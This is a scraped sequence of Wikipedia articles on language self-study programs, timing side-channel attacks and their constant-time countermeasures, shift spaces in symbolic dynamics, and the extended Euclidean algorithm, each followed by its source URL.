https://en.wikipedia.org/wiki/Large_language_model
|
Self-studylanguage acquisitionprograms allow learning without having a teacher present,[1][2]and the courses can supplement or replace classroom instruction.[3]Universities use self-study programs for less-commonly taught languages, where having professors is not feasible.[4][5]Self-study programs are available on paper, audio files, video files, smartphone apps, computers, or any combination.[6]
This list is limited to programs that teach four or more languages. There are many others that teach one language.
Alphabetical lists of languages show the courses available to learn each language, at All Language Resources, Lang1234, Martindale's Language Center,Omniglot, and Rüdiger Köppe. (UCLA Language Materials Projecthas ended.) For the thousands of languages not listed on those sites, for which no course exists,Global Recordings Networkhas recorded a standard set of Bible stories in 6,000 languages. With effort, learners can study any language by comparing their recordings to the same story in a language they know.[7]
The list of self-study programs, below, shows the number of languages taught by each program, the name of the program, and the number of different languages used for instruction. Multiple languages of instruction may be available for some but not all courses. For example,Reise Know-Howuses six languages to teach German, but only German to teach the other languages. On the other handEurotalk,Pronunciatorand50Languagesuse all languages to teach all the other languages.
|
https://en.wikipedia.org/wiki/List_of_language_self-study_programs
|
Incryptography, atiming attackis aside-channel attackin which the attacker attempts to compromise acryptosystemby analyzing the time taken to execute cryptographic algorithms. Every logical operation in a computer takes time to execute, and the time can differ based on the input; with precise measurements of the time for each operation, an attacker can work backwards to the input. Finding secrets through timing information may be significantly easier than usingcryptanalysisof known plaintext, ciphertext pairs. Sometimes timing information is combined with cryptanalysis to increase the rate of information leakage.[1]
Information can leak from a system through measurement of the time it takes to respond to certain queries. How much this information can help an attacker depends on many variables: cryptographic system design, the CPU running the system, the algorithms used, assorted implementation details, timing attack countermeasures, the accuracy of the timing measurements, etc. Timing attacks can be applied to any algorithm that has data-dependent timing variation. Removing timing-dependencies is difficult in some algorithms that use low-level operations that frequently exhibit varied execution time.
Timing attacks are often overlooked in the design phase because they are so dependent on the implementation and can be introduced unintentionally withcompiler optimizations. Avoidance of timing attacks involves design of constant-time functions and careful testing of the final executable code.[1]
Many cryptographic algorithms can be implemented (or masked by a proxy) in a way that reduces or eliminates data-dependent timing information, known as aconstant-time algorithm. An implementation of such an algorithm is sometimes called atiming-safe implementation.[2]Consider an implementation in which every call to a subroutine always returns in exactly x seconds, where x is the maximum time it ever takes to execute that routine on every possible authorized input. In such an implementation, the timing of the algorithm is less likely to leak information about the data supplied to that invocation.[3]The downside of this approach is that the time used for all executions becomes that of theworst-caseperformance of the function.
The data-dependency of timing may stem from one of the following:[1]
Time attacks can also be performed remotely over a network. Observing delays in a system is often influenced by random perturbations, which become even more significant when the observation occurs through a network. In most cases, time attacks require the attacker to have knowledge of the implementation details. However, such attacks can also be leveraged to identify the algorithms in use and facilitate reverse engineering.
The execution time for thesquare-and-multiply algorithmused inmodular exponentiationdepends linearly on the number of '1' bits in the key. While the number of '1' bits alone is not nearly enough information to make finding the key easy, repeated executions with the same key and different inputs can be used to perform statistical correlation analysis of timing information to recover the key completely, even by a passive attacker. Observed timing measurements often include noise (from such sources as network latency, or disk drive access differences from access to access, and theerror correctiontechniques used to recover from transmission errors). Nevertheless, timing attacks are practical against a number of encryption algorithms, includingRSA,ElGamal, and theDigital Signature Algorithm.
In 2003,BonehandBrumleydemonstrated a practical network-based timing attack onSSL-enabled web servers, based on a different vulnerability having to do with the use of RSA withChinese remainder theoremoptimizations. The actual network distance was small in their experiments, but the attack successfully recovered a server private key in a matter of hours. This demonstration led to the widespread deployment and use ofblindingtechniques in SSL implementations. In this context, blinding is intended to remove correlations between key and encryption time.[4]
Some versions ofUnixuse a relatively expensive implementation of thecryptlibrary function for hashing an 8-character password into an 11-character string. On older hardware, this computation took a deliberately and measurably long time: as much as two or three seconds in some cases.[citation needed]Theloginprogram in early versions of Unix executed the crypt function only when the login name was recognized by the system. This leaked information through timing about the validity of the login name, even when the password was incorrect. An attacker could exploit such leaks by first applyingbrute-forceto produce a list of login names known to be valid, then attempt to gain access by combining only these names with a large set of passwords known to be frequently used. Without any information on the validity of login names the time needed to execute such an approach would increase by orders of magnitude, effectively rendering it useless. Later versions of Unix have fixed this leak by always executing the crypt function, regardless of login name validity.[citation needed]
Two otherwise securely isolated processes running on a single system with eithercache memoryorvirtual memorycan communicate by deliberately causingpage faultsand/orcache missesin one process, then monitoring the resulting changes in access times from the other. Likewise, if an application is trusted, but its paging/caching is affected by branching logic, it may be possible for a second application to determine the values of the data compared to the branch condition by monitoring access time changes; in extreme examples, this can allow recovery of cryptographic key bits.[5][6]
The 2017MeltdownandSpectreattacks which forced CPU manufacturers (including Intel, AMD, ARM, and IBM) to redesign their CPUs both rely on timing attacks.[7]As of early 2018, almost every computer system in the world is affected by Spectre.[8][9][10]
Timing attacks are difficult to prevent and can often be used to extend other attacks. For example, in 2018, an old attack on RSA was rediscovered in a timing side-channel variant, two decades after the original bug.[11]
The followingCcode demonstrates a typical insecure string comparison which stops testing as soon as a character doesn't match. For example, when comparing "ABCDE" with "ABxDE" it will return after 3 loop iterations:
By comparison, the following version runs in constant-time by testing all characters and using abitwise operationto accumulate the result:
In the world of C library functions, the first function is analogous tomemcmp(), while the latter is analogous to NetBSD'sconsttime_memequal()or[12]OpenBSD'stimingsafe_bcmp()andtimingsafe_memcmp. On other systems, the comparison function from cryptographic libraries likeOpenSSLandlibsodiumcan be used.
Timing attacks are easier to mount if the adversary knows the internals of the hardware implementation, and even more so, the cryptographic system in use. Since cryptographic security should never depend on the obscurity of either (seesecurity through obscurity, specifically both Shannon's Maxim andKerckhoffs's principle), resistance to timing attacks should not either. If nothing else, an exemplar can be purchased and reverse engineered. Timing attacks and other side-channel attacks may also be useful in identifying, or possibly reverse-engineering, a cryptographic algorithm used by some device.
|
https://en.wikipedia.org/wiki/Timing_attack
|
Insymbolic dynamicsand related branches ofmathematics, ashift spaceorsubshiftis a set ofinfinitewordsthat represent the evolution of adiscrete system. In fact, shift spaces andsymbolic dynamical systemsare often consideredsynonyms. The most widely studied shift spaces are thesubshifts of finite typeand thesofic shifts.
In theclassical framework[1]a shift space is any subsetΛ{\displaystyle \Lambda }ofAZ:={(xi)i∈Z:xi∈A∀i∈Z}{\displaystyle A^{\mathbb {Z} }:=\{(x_{i})_{i\in \mathbb {Z} }:\ x_{i}\in A\ \forall i\in \mathbb {Z} \}}, whereA{\displaystyle A}is afinite set, which is closed for the Tychonov topology and invariant by translations. More generally one can define a shift space as the closed and translation-invariant subsets ofAG{\displaystyle A^{\mathbb {G} }}, whereA{\displaystyle A}is any non-empty set andG{\displaystyle \mathbb {G} }is anymonoid.[2][3]
LetG{\displaystyle \mathbb {G} }be amonoid, and giveng,h∈G{\displaystyle g,h\in \mathbb {G} }, denote the operation ofg{\displaystyle g}withh{\displaystyle h}by the productgh{\displaystyle gh}. Let1G{\displaystyle \mathbf {1} _{\mathbb {G} }}denote the identity ofG{\displaystyle \mathbb {G} }. Consider a non-empty setA{\displaystyle A}(an alphabet) with thediscrete topology, and defineAG{\displaystyle A^{\mathbb {G} }}as the set of all patterns overA{\displaystyle A}indexed byG{\displaystyle \mathbb {G} }. Forx=(xi)i∈G∈AG{\displaystyle \mathbf {x} =(x_{i})_{i\in \mathbb {G} }\in A^{\mathbb {G} }}and a subsetN⊂G{\displaystyle N\subset \mathbb {G} }, we denote the restriction ofx{\displaystyle \mathbf {x} }to the indices ofN{\displaystyle N}asxN:=(xi)i∈N{\displaystyle \mathbf {x} _{N}:=(x_{i})_{i\in N}}.
OnAG{\displaystyle A^{\mathbb {G} }}, we consider the prodiscrete topology, which makesAG{\displaystyle A^{\mathbb {G} }}a Hausdorff and totally disconnected topological space. In the case ofA{\displaystyle A}being finite, it follows thatAG{\displaystyle A^{\mathbb {G} }}is compact. However, ifA{\displaystyle A}is not finite, thenAG{\displaystyle A^{\mathbb {G} }}is not even locally compact.
This topology will be metrizable if and only ifG{\displaystyle \mathbb {G} }is countable, and, in any case, the base of this topology consists of a collection of open/closed sets (called cylinders), defined as follows: given a finite set of indicesD⊂G{\displaystyle D\subset \mathbb {G} }, and for eachi∈D{\displaystyle i\in D}, letai∈A{\displaystyle a_{i}\in A}. Thecylindergiven byD{\displaystyle D}and(ai)i∈D∈A|D|{\displaystyle (a_{i})_{i\in D}\in A^{|D|}}is the set
WhenD={g}{\displaystyle D=\{g\}}, we denote the cylinder fixing the symbolb{\displaystyle b}at the entry indexed byg{\displaystyle g}simply as[b]g{\displaystyle [b]_{g}}.
In other words, a cylinder[(ai)i∈D]D{\displaystyle {\big [}(a_{i})_{i\in D}{\big ]}_{D}}is the set of all set of all infinite patterns ofAG{\displaystyle A^{\mathbb {G} }}which contain the finite pattern(ai)i∈D∈A|D|{\displaystyle (a_{i})_{i\in D}\in A^{|D|}}.
Giveng∈G{\displaystyle g\in \mathbb {G} }, theg-shift maponAG{\displaystyle A^{\mathbb {G} }}is denoted byσg:AG→AG{\displaystyle \sigma ^{g}:A^{\mathbb {G} }\to A^{\mathbb {G} }}and defined as
Ashift spaceover the alphabetA{\displaystyle A}is a setΛ⊂AG{\displaystyle \Lambda \subset A^{\mathbb {G} }}that is closed under the topology ofAG{\displaystyle A^{\mathbb {G} }}and invariant under translations, i.e.,σg(Λ)⊂Λ{\displaystyle \sigma ^{g}(\Lambda )\subset \Lambda }for allg∈G{\displaystyle g\in \mathbb {G} }.[note 1]We consider in the shift spaceΛ{\displaystyle \Lambda }the induced topology fromAG{\displaystyle A^{\mathbb {G} }}, which has as basic open sets the cylinders[(ai)i∈D]Λ:=[(ai)i∈D]∩Λ{\displaystyle {\big [}(a_{i})_{i\in D}{\big ]}_{\Lambda }:={\big [}(a_{i})_{i\in D}{\big ]}\cap \Lambda }.
For eachk∈N∗{\displaystyle k\in \mathbb {N} ^{*}}, defineNk:=⋃N⊂G#N=kAN{\displaystyle {\mathcal {N}}_{k}:=\bigcup _{N\subset \mathbb {G} \atop \#N=k}A^{N}}, andNAGf:=⋃k∈NNk=⋃N⊂G#N<∞AN{\displaystyle {\mathcal {N}}_{A^{\mathbb {G} }}^{f}:=\bigcup _{k\in \mathbb {N} }{\mathcal {N}}_{k}=\bigcup _{N\subset \mathbb {G} \atop \#N<\infty }A^{N}}. An equivalent way to define a shift space is to take a set offorbidden patternsF⊂NAGf{\displaystyle F\subset {\mathcal {N}}_{A^{\mathbb {G} }}^{f}}and define a shift space as the set
Intuitively, a shift spaceXF{\displaystyle X_{F}}is the set of all infinite patterns that do not contain any forbidden finite pattern ofF{\displaystyle F}.
Given a shift spaceΛ⊂AG{\displaystyle \Lambda \subset A^{\mathbb {G} }}and a finite set of indicesN⊂G{\displaystyle N\subset \mathbb {G} }, letW∅(Λ):={ϵ}{\displaystyle W_{\emptyset }(\Lambda ):=\{\epsilon \}}, whereϵ{\displaystyle \epsilon }stands for the empty word, and forN≠∅{\displaystyle N\neq \emptyset }letWN(Λ)⊂AN{\displaystyle W_{N}(\Lambda )\subset A^{N}}be the set of all finite configurations ofAN{\displaystyle A^{N}}that appear in some sequence ofΛ{\displaystyle \Lambda }, i.e.,
Note that, sinceΛ{\displaystyle \Lambda }is a shift space, ifM⊂G{\displaystyle M\subset \mathbb {G} }is a translation ofN⊂G{\displaystyle N\subset \mathbb {G} }, i.e.,M=gN{\displaystyle M=gN}for someg∈G{\displaystyle g\in \mathbb {G} }, then(wj)j∈M∈WM(Λ){\displaystyle (w_{j})_{j\in M}\in W_{M}(\Lambda )}if and only if there exists(vi)i∈N∈WN(Λ){\displaystyle (v_{i})_{i\in N}\in W_{N}(\Lambda )}such thatwj=vi{\displaystyle w_{j}=v_{i}}ifj=gi{\displaystyle j=gi}. In other words,WM(Λ){\displaystyle W_{M}(\Lambda )}andWN(Λ){\displaystyle W_{N}(\Lambda )}contain the same configurations modulo translation. We will call the set
thelanguageofΛ{\displaystyle \Lambda }. In the general context stated here, the language of a shift space has not the same mean of that inFormal Language Theory, but in theclassical frameworkwhich considers the alphabetA{\displaystyle A}being finite, andG{\displaystyle \mathbb {G} }beingN{\displaystyle \mathbb {N} }orZ{\displaystyle \mathbb {Z} }with the usual addition, the language of a shift space is a formal language.
The classical framework for shift spaces consists of considering the alphabetA{\displaystyle A}as finite, andG{\displaystyle \mathbb {G} }as the set of non-negative integers (N{\displaystyle \mathbb {N} }) with the usual addition, or the set of all integers (Z{\displaystyle \mathbb {Z} }) with the usual addition. In both cases, the identity element1G{\displaystyle \mathbf {1} _{\mathbb {G} }}corresponds to the number 0. Furthermore, whenG=N{\displaystyle \mathbb {G} =\mathbb {N} }, since allN∖{0}{\displaystyle \mathbb {N} \setminus \{0\}}can be generated from the number 1, it is sufficient to consider a unique shift map given byσ(x)n=xn+1{\displaystyle \sigma (\mathbf {x} )_{n}=x_{n+1}}for alln{\displaystyle n}. On the other hand, for the case ofG=Z{\displaystyle \mathbb {G} =\mathbb {Z} }, since allZ{\displaystyle \mathbb {Z} }can be generated from the numbers {-1, 1}, it is sufficient to consider two shift maps given for alln{\displaystyle n}byσ(x)n=xn+1{\displaystyle \sigma (\mathbf {x} )_{n}=x_{n+1}}and byσ−1(x)n=xn−1{\displaystyle \sigma ^{-1}(\mathbf {x} )_{n}=x_{n-1}}.
Furthermore, wheneverG{\displaystyle \mathbb {G} }isN{\displaystyle \mathbb {N} }orZ{\displaystyle \mathbb {Z} }with the usual addition (independently of the cardinality ofA{\displaystyle A}), due to its algebraic structure, it is sufficient consider only cylinders in the form
Moreover, the language of a shift spaceΛ⊂AG{\displaystyle \Lambda \subset A^{\mathbb {G} }}will be given by
whereW0:={ϵ}{\displaystyle W_{0}:=\{\epsilon \}}andϵ{\displaystyle \epsilon }stands for the empty word, and
In the same way, for the particular case ofG=Z{\displaystyle \mathbb {G} =\mathbb {Z} }, it follows that to define a shift spaceΛ=XF{\displaystyle \Lambda =X_{F}}we do not need to specify the index ofG{\displaystyle \mathbb {G} }on which the forbidden words ofF{\displaystyle F}are defined, that is, we can just considerF⊂⋃n≥1An{\displaystyle F\subset \bigcup _{n\geq 1}A^{n}}and then
However, ifG=N{\displaystyle \mathbb {G} =\mathbb {N} }, if we define a shift spaceΛ=XF{\displaystyle \Lambda =X_{F}}as above, without to specify the index of where the words are forbidden, then we will just capture shift spaces which are invariant through the shift map, that is, such thatσ(XF)=XF{\displaystyle \sigma (X_{F})=X_{F}}. In fact, to define a shift spaceXF⊂AN{\displaystyle X_{F}\subset A^{\mathbb {N} }}such thatσ(XF)⊊XF{\displaystyle \sigma (X_{F})\subsetneq X_{F}}it will be necessary to specify from which index on the words ofF{\displaystyle F}are forbidden.
In particular, in the classical framework ofA{\displaystyle A}being finite, andG{\displaystyle \mathbb {G} }beingN{\displaystyle \mathbb {N} }) orZ{\displaystyle \mathbb {Z} }with the usual addition, it follows thatMF{\displaystyle M_{F}}is finite if and only ifF{\displaystyle F}is finite, which leads to classical definition of a shift of finite type as those shift spacesΛ⊂AG{\displaystyle \Lambda \subset A^{\mathbb {G} }}such thatΛ=XF{\displaystyle \Lambda =X_{F}}for some finiteF{\displaystyle F}.
Among several types of shift spaces, the most widely studied are theshifts of finite typeand thesofic shifts.
In the case when the alphabetA{\displaystyle A}is finite, a shift spaceΛ{\displaystyle \Lambda }is ashift of finite typeif we can take a finite set of forbidden patternsF{\displaystyle F}such thatΛ=XF{\displaystyle \Lambda =X_{F}}, andΛ{\displaystyle \Lambda }is asofic shiftif it is the image of a shift of finite type undersliding block code[1](that is, a mapΦ{\displaystyle \Phi }that is continuous and invariant for allg{\displaystyle g}-shift maps ). IfA{\displaystyle A}is finite andG{\displaystyle \mathbb {G} }isN{\displaystyle \mathbb {N} }orZ{\displaystyle \mathbb {Z} }with the usual addition, then the shiftΛ{\displaystyle \Lambda }is a sofic shift if and only ifW(Λ){\displaystyle W(\Lambda )}is aregular language.
The name "sofic" was coined byWeiss (1973), based on theHebrewword סופי meaning "finite", to refer to the fact that this is a generalization of a finiteness property.[4]
WhenA{\displaystyle A}is infinite, it is possible to define shifts of finite type as shift spacesΛ{\displaystyle \Lambda }for those one can take a setF{\displaystyle F}of forbidden words such that
is finite andΛ=XF{\displaystyle \Lambda =X_{F}}.[3]In this context of infinite alphabet, a sofic shift will be defined as the image of a shift of finite type under a particular class ofsliding block codes.[3]Both, the finiteness ofMF{\displaystyle M_{F}}and the additional conditions thesliding block codes, are trivially satisfied wheneverA{\displaystyle A}is finite.
Shift spaces are thetopological spaceson whichsymbolic dynamical systemsare usually defined.
Given a shift spaceΛ⊂AG{\displaystyle \Lambda \subset A^{\mathbb {G} }}and ag{\displaystyle g}-shift mapσg:Λ→Λ{\displaystyle \sigma ^{g}:\Lambda \to \Lambda }it follows that the pair(Λ,σg){\displaystyle (\Lambda ,\sigma ^{g})}is atopological dynamical system.
Two shift spacesΛ⊂AG{\displaystyle \Lambda \subset A^{\mathbb {G} }}andΓ⊂BG{\displaystyle \Gamma \subset B^{\mathbb {G} }}are said to be topologically conjugate (or simply conjugate) if for eachg{\displaystyle g}-shift map it follows that the topological dynamical systems(Λ,σg){\displaystyle (\Lambda ,\sigma ^{g})}and(Γ,σg){\displaystyle (\Gamma ,\sigma ^{g})}aretopologically conjugate, that is, if there exists a continuous mapΦ:Λ→Γ{\displaystyle \Phi :\Lambda \to \Gamma }such thatΦ∘σg=σg∘Φ{\displaystyle \Phi \circ \sigma ^{g}=\sigma ^{g}\circ \Phi }. Such maps are known asgeneralized sliding block codesor just assliding block codeswheneverΦ{\displaystyle \Phi }is uniformly continuous.[3]
Although any continuous mapΦ{\displaystyle \Phi }fromΛ⊂AG{\displaystyle \Lambda \subset A^{\mathbb {G} }}to itself will define a topological dynamical system(Λ,Φ){\displaystyle (\Lambda ,\Phi )}, in symbolic dynamics it is usual to consider only continuous mapsΦ:Λ→Λ{\displaystyle \Phi :\Lambda \to \Lambda }which commute with allg{\displaystyle g}-shift maps, i. e., maps which are generalized sliding block codes. The dynamical system(Λ,Φ){\displaystyle (\Lambda ,\Phi )}is known as a 'generalized cellular automaton'(or just as acellular automatonwheneverΦ{\displaystyle \Phi }is uniformly continuous).
The first trivial example of shift space (of finite type) is thefull shiftAN{\displaystyle A^{\mathbb {N} }}.
LetA={a,b}{\displaystyle A=\{a,b\}}. The set of all infinite words overAcontaining at most onebis a sofic subshift, not of finite type. The set of all infinite words overAwhosebform blocks of prime length is not sofic (this can be shown by using thepumping lemma).
The space of infinite strings in two letters,{0,1}N{\displaystyle \{0,1\}^{\mathbb {N} }}is called theBernoulli process. It is isomorphic to theCantor set.
The bi-infinite space of strings in two letters,{0,1}Z{\displaystyle \{0,1\}^{\mathbb {Z} }}is commonly known as theBaker's map, or rather is homomorphic to the Baker's map.
|
https://en.wikipedia.org/wiki/Shift_space
|
Inarithmeticandcomputer programming, theextended Euclidean algorithmis an extension to theEuclidean algorithm, and computes, in addition to thegreatest common divisor(gcd) of integersaandb, also the coefficients ofBézout's identity, which are integersxandysuch that
This is acertifying algorithm, because the gcd is the only number that can simultaneously satisfy this equation and divide the inputs.[1]It allows one to compute also, with almost no extra cost, the quotients ofaandbby their greatest common divisor.
Extended Euclidean algorithmalso refers to avery similar algorithmfor computing thepolynomial greatest common divisorand the coefficients of Bézout's identity of twounivariate polynomials.
The extended Euclidean algorithm is particularly useful whenaandbarecoprime. With that provision,xis themodular multiplicative inverseofamodulob, andyis the modular multiplicative inverse ofbmoduloa. Similarly, the polynomial extended Euclidean algorithm allows one to compute themultiplicative inverseinalgebraic field extensionsand, in particular infinite fieldsof non prime order. It follows that both extended Euclidean algorithms are widely used incryptography. In particular, the computation of themodular multiplicative inverseis an essential step in the derivation of key-pairs in theRSApublic-key encryption method.
The standard Euclidean algorithm proceeds by a succession ofEuclidean divisionswhose quotients are not used. Only theremaindersare kept. For the extended algorithm, the successive quotients are used. More precisely, the standard Euclidean algorithm withaandbas input, consists of computing a sequenceq1,…,qk{\displaystyle q_{1},\ldots ,q_{k}}of quotients and a sequencer0,…,rk+1{\displaystyle r_{0},\ldots ,r_{k+1}}of remainders such that
It is the main property ofEuclidean divisionthat the inequalities on the right define uniquelyqi{\displaystyle q_{i}}andri+1{\displaystyle r_{i+1}}fromri−1{\displaystyle r_{i-1}}andri.{\displaystyle r_{i}.}
The computation stops when one reaches a remainderrk+1{\displaystyle r_{k+1}}which is zero; the greatest common divisor is then the last non zero remainderrk.{\displaystyle r_{k}.}
The extended Euclidean algorithm proceeds similarly, but adds two other sequences, as follows
The computation also stops whenrk+1=0{\displaystyle r_{k+1}=0}and gives
Moreover, ifaandbare both positive andgcd(a,b)≠min(a,b){\displaystyle \gcd(a,b)\neq \min(a,b)}, then
for0≤i≤k,{\displaystyle 0\leq i\leq k,}where⌊x⌋{\displaystyle \lfloor x\rfloor }denotes theintegral partofx, that is the greatest integer not greater thanx.
This implies that the pair of Bézout's coefficients provided by the extended Euclidean algorithm is theminimal pairof Bézout coefficients, as being the unique pair satisfying both above inequalities.
It also means that the algorithm can be done withoutinteger overflowby acomputer programusing integers of a fixed size that is larger than that ofaandb.
The following table shows how the extended Euclidean algorithm proceeds with input240and46. The greatest common divisor is the last non zero entry,2in the column "remainder". The computation stops at row 6, because the remainder in it is0. Bézout coefficients appear in the last two columns of the second-to-last row. In fact, it is easy to verify that−9×240+47×46=2. Finally the last two entries23and−120of the last row are, up to the sign, the quotients of the input46and240by the greatest common divisor2.
As0≤ri+1<|ri|,{\displaystyle 0\leq r_{i+1}<|r_{i}|,}the sequence of theri{\displaystyle r_{i}}is a decreasing sequence of nonnegative integers (fromi= 2 on). Thus it must stop with somerk+1=0.{\displaystyle r_{k+1}=0.}This proves that the algorithm stops eventually.
Asri+1=ri−1−riqi,{\displaystyle r_{i+1}=r_{i-1}-r_{i}q_{i},}the greatest common divisor is the same for(ri−1,ri){\displaystyle (r_{i-1},r_{i})}and(ri,ri+1).{\displaystyle (r_{i},r_{i+1}).}This shows that the greatest common divisor of the inputa=r0,b=r1{\displaystyle a=r_{0},b=r_{1}}is the same as that ofrk,rk+1=0.{\displaystyle r_{k},r_{k+1}=0.}This proves thatrk{\displaystyle r_{k}}is the greatest common divisor ofaandb. (Until this point, the proof is the same as that of the classical Euclidean algorithm.)
Asa=r0{\displaystyle a=r_{0}}andb=r1,{\displaystyle b=r_{1},}we haveasi+bti=ri{\displaystyle as_{i}+bt_{i}=r_{i}}fori= 0 and 1. The relation follows by induction for alli>1{\displaystyle i>1}:ri+1=ri−1−riqi=(asi−1+bti−1)−(asi+bti)qi=(asi−1−asiqi)+(bti−1−btiqi)=asi+1+bti+1.{\displaystyle r_{i+1}=r_{i-1}-r_{i}q_{i}=(as_{i-1}+bt_{i-1})-(as_{i}+bt_{i})q_{i}=(as_{i-1}-as_{i}q_{i})+(bt_{i-1}-bt_{i}q_{i})=as_{i+1}+bt_{i+1}.}
Thussk{\displaystyle s_{k}}andtk{\displaystyle t_{k}}are Bézout coefficients.
Consider the matrixAi=(si−1siti−1ti).{\displaystyle A_{i}={\begin{pmatrix}s_{i-1}&s_{i}\\t_{i-1}&t_{i}\end{pmatrix}}.}
The recurrence relation may be rewritten in matrix formAi+1=Ai⋅(011−qi).{\displaystyle A_{i+1}=A_{i}\cdot {\begin{pmatrix}0&1\\1&-q_{i}\end{pmatrix}}.}
The matrixA1{\displaystyle A_{1}}is the identity matrix and its determinant is one. The determinant of the rightmost matrix in the preceding formula is −1. It follows that the determinant ofAi{\displaystyle A_{i}}is(−1)i−1.{\displaystyle (-1)^{i-1}.}In particular, fori=k+1,{\displaystyle i=k+1,}we havesktk+1−tksk+1=(−1)k.{\displaystyle s_{k}t_{k+1}-t_{k}s_{k+1}=(-1)^{k}.}Viewing this as a Bézout's identity, this shows thatsk+1{\displaystyle s_{k+1}}andtk+1{\displaystyle t_{k+1}}arecoprime. The relationask+1+btk+1=0{\displaystyle as_{k+1}+bt_{k+1}=0}that has been proved above andEuclid's lemmashow thatsk+1{\displaystyle s_{k+1}}dividesb, that is thatb=dsk+1{\displaystyle b=ds_{k+1}}for some integerd. Dividing bysk+1{\displaystyle s_{k+1}}the relationask+1+btk+1=0{\displaystyle as_{k+1}+bt_{k+1}=0}givesa=−dtk+1.{\displaystyle a=-dt_{k+1}.}So,sk+1{\displaystyle s_{k+1}}and−tk+1{\displaystyle -t_{k+1}}are coprime integers that are the quotients ofaandbby a common factor, which is thus their greatest common divisor or itsopposite.
To prove the last assertion, assume thataandbare both positive andgcd(a,b)≠min(a,b){\displaystyle \gcd(a,b)\neq \min(a,b)}. Then,a≠b{\displaystyle a\neq b}, and ifa<b{\displaystyle a<b}, it can be seen that thesandtsequences for (a,b) under the EEA are, up to initial 0s and 1s, thetandssequences for (b,a). The definitions then show that the (a,b) case reduces to the (b,a) case. So assume thata>b{\displaystyle a>b}without loss of generality.
It can be seen thats2{\displaystyle s_{2}}is 1 ands3{\displaystyle s_{3}}(which exists bygcd(a,b)≠min(a,b){\displaystyle \gcd(a,b)\neq \min(a,b)}) is a negative integer. Thereafter, thesi{\displaystyle s_{i}}alternate in sign and strictly increase in magnitude, which follows inductively from the definitions and the fact thatqi≥1{\displaystyle q_{i}\geq 1}for1≤i≤k{\displaystyle 1\leq i\leq k}, the casei=1{\displaystyle i=1}holds becausea>b{\displaystyle a>b}. The same is true for theti{\displaystyle t_{i}}after the first few terms, for the same reason. Furthermore, it is easy to see thatqk≥2{\displaystyle q_{k}\geq 2}(whenaandbare both positive andgcd(a,b)≠min(a,b){\displaystyle \gcd(a,b)\neq \min(a,b)}). Thus, noticing that|sk+1|=|sk−1|+qk|sk|{\displaystyle |s_{k+1}|=|s_{k-1}|+q_{k}|s_{k}|}, we obtain|sk+1|=|bgcd(a,b)|≥2|sk|and|tk+1|=|agcd(a,b)|≥2|tk|.{\displaystyle |s_{k+1}|=\left|{\frac {b}{\gcd(a,b)}}\right|\geq 2|s_{k}|\qquad {\text{and}}\qquad |t_{k+1}|=\left|{\frac {a}{\gcd(a,b)}}\right|\geq 2|t_{k}|.}
This, accompanied by the fact thatsk,tk{\displaystyle s_{k},t_{k}}are larger than or equal to in absolute value than any previoussi{\displaystyle s_{i}}orti{\displaystyle t_{i}}respectively completed the proof.
Forunivariate polynomialswith coefficients in afield, everything works similarly, Euclidean division, Bézout's identity and extended Euclidean algorithm. The first difference is that, in the Euclidean division and the algorithm, the inequality0≤ri+1<|ri|{\displaystyle 0\leq r_{i+1}<|r_{i}|}has to be replaced by an inequality on the degreesdegri+1<degri.{\displaystyle \deg r_{i+1}<\deg r_{i}.}Otherwise, everything which precedes in this article remains the same, simply by replacing integers by polynomials.
A second difference lies in the bound on the size of the Bézout coefficients provided by the extended Euclidean algorithm, which is more accurate in the polynomial case, leading to the following theorem.
If a and b are two nonzero polynomials, then the extended Euclidean algorithm produces the unique pair of polynomials(s,t)such that
and
A third difference is that, in the polynomial case, the greatest common divisor is defined only up to the multiplication by a non zero constant. There are several ways to define unambiguously a greatest common divisor.
In mathematics, it is common to require that the greatest common divisor be amonic polynomial. To get this, it suffices to divide every element of the output by theleading coefficientofrk.{\displaystyle r_{k}.}This allows that, ifaandbare coprime, one gets 1 in the right-hand side of Bézout's inequality. Otherwise, one may get any non-zero constant. Incomputer algebra, the polynomials commonly have integer coefficients, and this way of normalizing the greatest common divisor introduces too many fractions to be convenient.
The second way to normalize the greatest common divisor in the case of polynomials with integer coefficients is to divide every output by thecontentofrk,{\displaystyle r_{k},}to get aprimitivegreatest common divisor. If the input polynomials are coprime, this normalisation also provides a greatest common divisor equal to 1. The drawback of this approach is that a lot of fractions should be computed and simplified during the computation.
A third approach consists in extending the algorithm ofsubresultant pseudo-remainder sequencesin a way that is similar to the extension of the Euclidean algorithm to the extended Euclidean algorithm. This allows that, when starting with polynomials with integer coefficients, all polynomials that are computed have integer coefficients. Moreover, every computed remainderri{\displaystyle r_{i}}is asubresultant polynomial. In particular, if the input polynomials are coprime, then the Bézout's identity becomes
whereRes(a,b){\displaystyle \operatorname {Res} (a,b)}denotes theresultantofaandb. In this form of Bézout's identity, there is no denominator in the formula. If one divides everything by the resultant one gets the classical Bézout's identity, with an explicit common denominator for the rational numbers that appear in it.
To implement the algorithm that is described above, one should first remark that only the two last values of the indexed variables are needed at each step. Thus, for saving memory, each indexed variable must be replaced by just two variables.
For simplicity, the following algorithm (and the other algorithms in this article) usesparallel assignments. In a programming language which does not have this feature, the parallel assignments need to be simulated with an auxiliary variable. For example, the first one,
is equivalent to
and similarly for the other parallel assignments.
This leads to the following code:
The quotients ofaandbby their greatest common divisor, which is output, may have an incorrect sign. This is easy to correct at the end of the computation but has not been done here for simplifying the code. Similarly, if eitheraorbis zero and the other is negative, the greatest common divisor that is output is negative, and all the signs of the output must be changed.
Finally, notice that in Bézout's identity,ax+by=gcd(a,b){\displaystyle ax+by=\gcd(a,b)}, one can solve fory{\displaystyle y}givena,b,x,gcd(a,b){\displaystyle a,b,x,\gcd(a,b)}. Thus, an optimization to the above algorithm is to compute only thesk{\displaystyle s_{k}}sequence (which yields the Bézout coefficientx{\displaystyle x}), and then computey{\displaystyle y}at the end:
However, in many cases this is not really an optimization: whereas the former algorithm is not susceptible to overflow when used with machine integers (that is, integers with a fixed upper bound of digits), the multiplication ofold_s * ain computation ofbezout_tcan overflow, limiting this optimization to inputs which can be represented in less than half the maximal size. When using integers of unbounded size, the time needed for multiplication and division grows quadratically with the size of the integers. This implies that the "optimisation" replaces a sequence of multiplications/divisions of small integers by a single multiplication/division, which requires more computing time than the operations that it replaces, taken together.
A fractiona/bis in canonical simplified form ifaandbarecoprimeandbis positive. This canonical simplified form can be obtained by replacing the three output lines of the preceding pseudo code by
The proof of this algorithm relies on the fact thatsandtare two coprime integers such thatas+bt= 0, and thusab=−ts{\displaystyle {\frac {a}{b}}=-{\frac {t}{s}}}. To get the canonical simplified form, it suffices to move the minus sign for having a positive denominator.
